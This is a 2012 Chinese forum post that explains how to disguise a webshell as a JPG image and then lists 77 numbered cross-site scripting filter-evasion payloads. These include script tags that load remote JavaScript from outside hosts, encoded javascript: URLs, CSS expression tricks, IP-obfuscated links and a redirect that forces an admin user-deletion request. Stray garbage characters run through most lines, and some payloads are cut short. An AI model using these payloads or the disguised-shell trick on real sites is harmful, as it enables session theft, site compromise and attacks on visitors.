跨站图片shell
7 A# e; U. R6 N; iXSS跨站代码 <script>alert("")</script>7 j" }3 N( Q6 U- {& w' ~
/ ~# J2 P7 p2 M
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
( d7 x* ~# ^. m7 L A# h+ l
$ I B' I; ^- n
' B5 z5 ], O& i$ O' E# G3 L
+ L' V) b/ E3 o0 y& A/ i1)普通的XSS JavaScript注入
' l9 L# U1 |" h( m" a<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- I3 }, C' ?2 w" P, z' O3 y+ x1 f- f z
(2)IMG标签XSS使用JavaScript命令
; ^3 F' B' q' c- P+ u<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
4 m6 A0 y: x4 ~# y* x: z- S$ s% {5 v( D3 j: Q1 d0 j+ Y* t s
(3)IMG标签无分号无引号
8 e: S& e1 h- j; c<IMG SRC=javascript:alert(‘XSS’)>
7 T* N: r" d N" A) v5 G) B- y/ T6 L7 P- Y' X/ V/ U
(4)IMG标签大小写不敏感
! ]4 h6 t& }- a h' j* q5 S9 V/ s<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
# Q# a$ k# \1 j b* R$ E. l8 ^$ k. J7 _! H
(5)HTML编码(必须有分号)
/ r9 C# }, a) |6 J! Y8 o" N<IMG SRC=javascript:alert(“XSS”)>
; f' _7 O) T3 r$ S0 m1 p
4 Z; h8 d* U1 u, {1 A(6)修正缺陷IMG标签/ B/ `' ~1 f6 Z( z& D
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
9 C, [6 o* D6 p$ S- b( c1 @- L, p$ A; I
(7)formCharCode标签(计算器)% ~' M0 o0 G- |0 C8 Q
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
7 x& K8 ?) M! o( x2 b% h* I, n) [: B! q+ y2 n4 W% G; K
(8)UTF-8的Unicode编码(计算器)
+ G" L+ m$ r) o, Z! z<IMG SRC=jav..省略..S')>, H( s6 K& s6 B+ n
. w9 P$ k) ^0 i+ f4 R% R2 A(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
7 Y: N* G: G5 z$ |; v<IMG SRC=jav..省略..S')>
5 E. i% W) e. T8 J( {; f8 R# K- \; H% Z6 V( ~8 s% x" @
(10)十六进制编码也是没有分号(计算器)2 R7 C1 q7 @/ |3 M
<IMG SRC=java..省略..XSS')>! L# u' }! _6 I1 r
, ^! _+ P8 f5 K9 O8 E# R. L/ e
(11)嵌入式标签,将Javascript分开
' Y8 y3 P% r% n& `5 [<IMG SRC=”jav ascript:alert(‘XSS’);”>
) Z! B9 f2 r @% z. k
$ S8 x) N' Q4 y g; M5 ~% _(12)嵌入式编码标签,将Javascript分开
0 _( C/ |+ c& y8 t' ]! Z<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ J6 k+ c; C. N5 h+ E4 E' v
( w3 F$ `3 I: C0 m j(13)嵌入式换行符
( u" D) b4 b% ]4 |% S<IMG SRC=”jav ascript:alert(‘XSS’);”>( \5 }; h2 |4 t; [1 [
; Y) i- E) E0 x9 f: c. _0 |(14)嵌入式回车3 P9 j# S2 [: @7 d
<IMG SRC=”jav ascript:alert(‘XSS’);”>5 Q7 Z+ z" @# U5 ]% |$ f. w- {
2 i3 I4 K. m$ V(15)嵌入式多行注入JavaScript,这是XSS极端的例子
# P8 A& p' C; b; K<IMG SRC=”javascript:alert(‘XSS‘)”>( j! N3 q7 z, M5 N
, \5 k/ f" X9 g( q7 e(16)解决限制字符(要求同页面)
7 A. K/ e& s8 q' Y8 L<script>z=’document.’</script>
- D* ^: U! ]; s+ U- `<script>z=z+’write(“‘</script>% \0 f3 k. L; ^6 ]
<script>z=z+’<script’</script>
, J( r1 z# \' Z; ?! [/ g" n<script>z=z+’ src=ht’</script>
# v7 y' i y: c2 C# {/ L& [' @<script>z=z+’tp://ww’</script>* _1 B3 F% U2 w- H! C2 {8 B7 Z4 Q
<script>z=z+’w.shell’</script>
8 x2 @4 b+ V% Z<script>z=z+’.net/1.’</script>' b% o P+ I/ E/ F2 I1 K
<script>z=z+’js></sc’</script> _0 k1 \3 O, q2 W. B7 D2 c
<script>z=z+’ript>”)’</script>
, S( N# T b: @! B, p% ~+ n9 H' n<script>eval_r(z)</script>
& _+ r* P; a0 L! A( @& e
5 p6 Z' B% G+ o$ v0 D: x- s( e/ M2 d% t(17)空字符' }4 ?% ~" C$ X- A6 I
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
- p3 ], e: H1 M! `- X5 B8 w2 m+ N' n* s. v/ V& q5 k
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
, W8 N3 u& Z- J) H( D/ H4 q/ S9 yperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
4 U! _- N5 p+ A# |& H) P- K9 z- q1 @& p1 n
(19)Spaces和meta前的IMG标签
' `" `& S2 C6 [& [% M- u<IMG SRC=” javascript:alert(‘XSS’);”>( U; X$ ?" Z) w4 g0 \* j! Y% u
% X& I H8 e* N' D' Y+ S(20)Non-alpha-non-digit XSS F. X, \1 d; I. t9 W( N, L9 u* F
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT> l, i' N% _: z2 B+ t3 D5 D- j. Y
( A) e4 b4 J0 R0 N; k6 y% H(21)Non-alpha-non-digit XSS to 2# ?7 R5 m% J% Z# Y- y3 g
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- g2 ^' `. T: ]2 R1 E: S! U
7 _3 @, ~. `" R(22)Non-alpha-non-digit XSS to 3
) `. V" t0 G3 J<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
$ a0 g. C$ }, x: ~/ p. ~
6 o( M* r8 S/ w; J4 O0 P! X9 r(23)双开括号
, p, l$ P# i8 g) O# Q2 l<<SCRIPT>alert(“XSS”);//<</SCRIPT>
! Q7 y6 l5 Z: p: J5 }2 i8 F( Y. p; A3 o9 [" L! Y' L
(24)无结束脚本标记(仅火狐等浏览器)' j- k1 |) s4 [/ Y
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>' p7 H' _7 X8 Z2 k! o8 o
; K& Q5 u! @/ }/ T* o(25)无结束脚本标记2
5 A' ^9 @! s( I# }8 D# A+ d<SCRIPT SRC=//3w.org/XSS/xss.js>
1 } f5 S5 N' q4 ]% |5 r0 z$ d8 r6 w+ V4 `$ a$ {
(26)半开的HTML/JavaScript XSS
+ l2 t0 x( M# |$ L6 @<IMG SRC=”javascript:alert(‘XSS’)”' r7 ]& z8 ]# y
4 f' p$ t+ ^1 S& D: w* u; A(27)双开角括号/ {7 L8 R: A w0 b7 \
<iframe src=http://3w.org/XSS.html <
k4 Q2 d# G: L2 m) ~' A0 d, F' _* h1 T) | Z/ \9 Q. a
(28)无单引号 双引号 分号 Y/ Z. c4 m9 C6 @0 {$ j# [
<SCRIPT>a=/XSS/9 S8 E" u( e% I6 b. J
alert(a.source)</SCRIPT>+ p, z3 Q! Z2 N+ W: N; z
% Z7 v& B: ?" i( x0 a+ F6 T/ {(29)换码过滤的JavaScript
) } d$ A1 l/ ?+ H: E3 A5 e\”;alert(‘XSS’);//+ r& O% S, n9 W
s% {; I/ D9 G: K- l; J; {7 y(30)结束Title标签
' R3 B8 R) e: G</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>9 T: L& Q7 j7 w: `
3 e7 R i: m- X# ~' |/ C' x(31)Input Image
" h# {' Y% C9 K. ?: S9 \<INPUT SRC=”javascript:alert(‘XSS’);”>$ O- e( C+ b: a
S% {" z( e. t9 a/ ?(32)BODY Image
& A3 ^0 @- ?' y" v8 e7 m' Q<BODY BACKGROUND=”javascript:alert(‘XSS’)”>( {! {8 R" _, R5 r
$ ]$ C' ^1 h* ]* l' e( g; h(33)BODY标签
. z8 o O) `; z+ ]. j* h, C: [<BODY(‘XSS’)>
# c( w6 Q- O: B5 w% ?+ `5 J
8 B( k$ J/ I' \$ L" r(34)IMG Dynsrc
& O* x; G3 w2 W, H; B<IMG DYNSRC=”javascript:alert(‘XSS’)”>/ ~4 A- s1 |8 ^$ c& D
' u5 y7 T& G; P(35)IMG Lowsrc
7 \4 o) {2 e+ u) B; M y<IMG LOWSRC=”javascript:alert(‘XSS’)”>8 P% b: x2 `& I: d7 [3 I4 \
: h$ C; l+ s+ Y9 p9 Z5 L(36)BGSOUND
0 v4 _, P0 ~3 [$ M2 F1 m<BGSOUND SRC=”javascript:alert(‘XSS’);”>
8 C, C5 g! M! `: V% d+ M: A! U& D
9 a- h. m! q, \(37)STYLE sheet1 W! H! w7 `3 [+ g6 M
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
$ U3 z5 M7 f3 S X/ r; s1 K! h/ O7 E# D& j' f. s$ g9 T/ z
(38)远程样式表3 N: g* T! E6 m. \
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
2 x7 c0 [' U6 U2 K. D& H, A+ {
) x9 g/ a- r. k% k3 L+ y1 G: S(39)List-style-image(列表式)
( ]3 ]( n I3 K<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS4 g* d- I' C o6 J7 I. U$ l
% A i1 f2 C5 c [6 m; `(40)IMG VBscript
* E. j4 t5 k7 F; a+ u/ Q+ u<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS$ N2 N. h h! t3 m
( C" n# t4 g# T- Z* W% B0 V(41)META链接url D" z* ?( a0 H! x' M* v. R
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>, @: \- s( L& ]# W
9 u% C" ^' D3 M# D(42)Iframe4 ~# m1 A @3 ? `( _7 [
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
5 [$ d9 W& P& \$ W% @(43)Frame: q" c5 @8 j j v8 w4 e- l9 d/ U
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>; K- @& \: R- S# Y) P/ x# ^
' B* Z& q- h2 N- r5 A5 R" F(44)Table
% G) v$ Y7 F$ y# @6 D<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
) z e" y. ~% _ ^9 p+ {! ]# s' ~8 o' Q/ v% T' ]
(45)TD
! A# T8 M% r7 f<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
7 _; q z) ~ Z, s1 a! \" W( F/ j5 V$ `
' B0 t" ?# m8 w. O: @" Q(46)DIV background-image
A) y3 {% U( x/ E5 C u: Q<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 \1 g7 z5 }+ o9 Y- X
8 W! n* p4 q% O" j(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)/ x0 k( B6 H' F: G! Y [( ?1 t& s
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”># ^7 L3 U) { }; X9 D8 z
5 C* ?$ K& l6 Q% U6 _
(48)DIV expression
# x G& n L5 B<DIV STYLE=”width: expression_r(alert(‘XSS’));”>1 |1 P9 O) |# D
/ {6 \. t8 u5 T* o# N, T(49)STYLE属性分拆表达
( H2 k& v2 F2 j' c<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
1 S- ]6 ?2 \% r) Y7 j! V1 `( O! m {/ W0 i# }
(50)匿名STYLE(组成:开角号和一个字母开头)
3 E r, |1 J- z<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
' v/ ~( z- i2 b* B& G) n- N- F2 }$ h+ b! ^$ l
(51)STYLE background-image. ]) |, m+ n3 O7 Q- u
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>) o8 Z. q, r P. a
3 h/ {4 ^) S! m4 P! e(52)IMG STYLE方式$ g3 |- F- t2 _9 b* U9 X H; a
exppression(alert(“XSS”))’>( t" N' o3 z& u9 ?' }& D
* I4 q9 p7 w. ^8 d5 o
(53)STYLE background5 U; Z: u. q$ v% o# R6 \
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>6 r4 X4 Z/ r- I4 D
, F& U, H; w. p5 }1 ?+ s3 y+ w* V
(54)BASE
, S5 L! m e# K) h/ K<BASE HREF=”javascript:alert(‘XSS’);//”>
7 e+ d, `. P$ s ^& d2 l/ f- U/ c2 Z* d" l# a/ Q3 b6 j* J
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
/ A/ P, _+ d- @7 j<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
9 R& X a" s4 m. V) J) i/ K4 A: g% A! z/ ~2 H5 ^. m
(56)在flash中使用ActionScrpt可以混进你XSS的代码' T, a; F& E* k) A$ {/ e% G) Q* N; {
a=”get”;/ }% o; U1 N4 F( A+ ^" I' A
b=”URL(\”";4 c) h& U/ t1 _
c=”javascript:”;
% Q5 o2 a8 A9 e* zd=”alert(‘XSS’);\”)”;/ s/ B) S( w- e; N
eval_r(a+b+c+d);# Q) o6 m% }/ m$ c
4 j/ C. X6 x) Y" U, H* Z
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上' ~7 ~3 _( \. x: q% V! c
<HTML xmlns:xss>
, f9 s% H% o! |. @5 [' I<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
: H$ A0 n, f, \- L# V3 Z% c5 u% u<xss:xss>XSS</xss:xss>
- l2 m# C* T7 d! ^0 R' M) Z</HTML>
& H X! f+ a' K% Y9 {8 U
) v+ L- a# L6 ^(58)如果过滤了你的JS你可以在图片里添加JS代码来利用5 F- }: X; @. q* l- ~
<SCRIPT SRC=””></SCRIPT>
- J+ D0 v4 v7 D% f* O' B9 c) V- K3 P( T: ~5 h5 R
(59)IMG嵌入式命令,可执行任意命令
; F. c( g A# }( [; ]: _<IMG SRC=”http://www.XXX.com/a.php?a=b”>7 H# V% j! C' g" t
" ~. A8 _2 n# D- O3 m0 D# l(60)IMG嵌入式命令(a.jpg在同服务器)" @8 p0 V* z9 C+ e: {
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser6 m% m/ e" u4 n9 A0 o
3 \5 r" X( e: _(61)绕符号过滤' g& J6 m$ l) `2 e! c
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
. t5 r* u( U% L, [
4 I3 T% x z+ [% ?5 \" I(62)
' j5 w; e5 [/ Z% f1 @" S( o<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ R: A4 ` i8 m3 k8 P# ]6 s3 p* {$ a6 y# _7 F" H4 |- P
(63)
% o" Q. y, R& J2 f8 Y+ D) ~! _<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
9 k+ D3 K5 O+ _& t8 [$ G1 S8 W$ N0 J2 r# i' N
(64)
$ P$ u; L' @6 \5 U. T2 l<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>8 x; C5 D, m7 L9 }# {
" E- q! F! w& _5 [* A, t( W; t+ F# {9 {(65)
N: c9 D4 e' p1 ^! Z6 v; q; }% ~<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
* w5 n, R3 A; M/ j' C. H
9 S9 o7 }/ g: A [( e(66)
+ C; C( [3 `4 y" Q& _0 A# _( s9 G( Z<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT># L4 D9 m3 g! h6 n
* T" t, X* p/ F3 N; y% P/ _
(67)" x' `) u& }4 z
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>2 ] ^0 F7 | v+ F% s9 D
6 R$ }4 c K( _3 T
(68)URL绕行
+ q4 `4 ` Y$ y9 j0 H% a6 v7 V<A HREF=”http://127.0.0.1/”>XSS</A>
& M! Y4 l6 _. |8 c& O4 ]% o' {% F5 p9 k% H5 S u! [
(69)URL编码7 m; K5 S; l `7 O; D
<A HREF=”http://3w.org”>XSS</A>4 Z% f* k3 C% w4 M) m6 X1 A
2 F2 S0 U9 e% n% \. _
(70)IP十进制
( {4 D5 F2 M7 J; R$ H0 T( N7 y<A HREF=”http://3232235521″>XSS</A>' ` N4 r5 ?- t+ E @
1 O, P2 l4 r/ K( T) g7 U
(71)IP十六进制
2 \$ q6 i1 n5 j& @1 s4 b. K<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>) D V. {- b2 H4 |4 ]: ?& s! |8 y
6 }8 A( J% ?( k2 R C6 q: K(72)IP八进制
+ _2 ~" ~7 D' s8 L0 d [. R" h8 A% m<A HREF=”http://0300.0250.0000.0001″>XSS</A>& Q" B% K( ?) _4 R" Q
, V. H( V5 O( z# c; @% Y: |0 n
(73)混合编码
5 v* m0 D/ i# b& Y, p<A HREF=”h6 Y. r5 l# ]6 _( c: j! }' F. d/ r, f
tt p://6 6.000146.0×7.147/”">XSS</A>3 H/ y, b8 ^) A; o
! V! ]8 n# W5 [( q
(74)节省[http:]
8 B+ a' H X; ]) Q<A HREF=”//www.google.com/”>XSS</A>8 q$ Y) X8 Z) N) c! N! V
- i5 D! q% x4 x, W6 N(75)节省[www]* k* v+ X( W" }0 D, o
<A HREF=”http://google.com/”>XSS</A>
" b2 W3 ~$ |9 k6 K7 i4 k% @% p( d
" b/ N1 Q1 `, P(76)绝对点绝对DNS3 M4 _: V9 B' g3 x- T
<A HREF=”http://www.google.com./”>XSS</A>1 U8 X9 a' j, M* b5 O
1 x+ }; y0 n' `/ E
(77)javascript链接9 P9 a; r8 H8 B( ~. @4 m5 l
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
# s' @ f b) j& Q" j H |
发表于 2012-9-13 17:04:56
收藏
支持
反对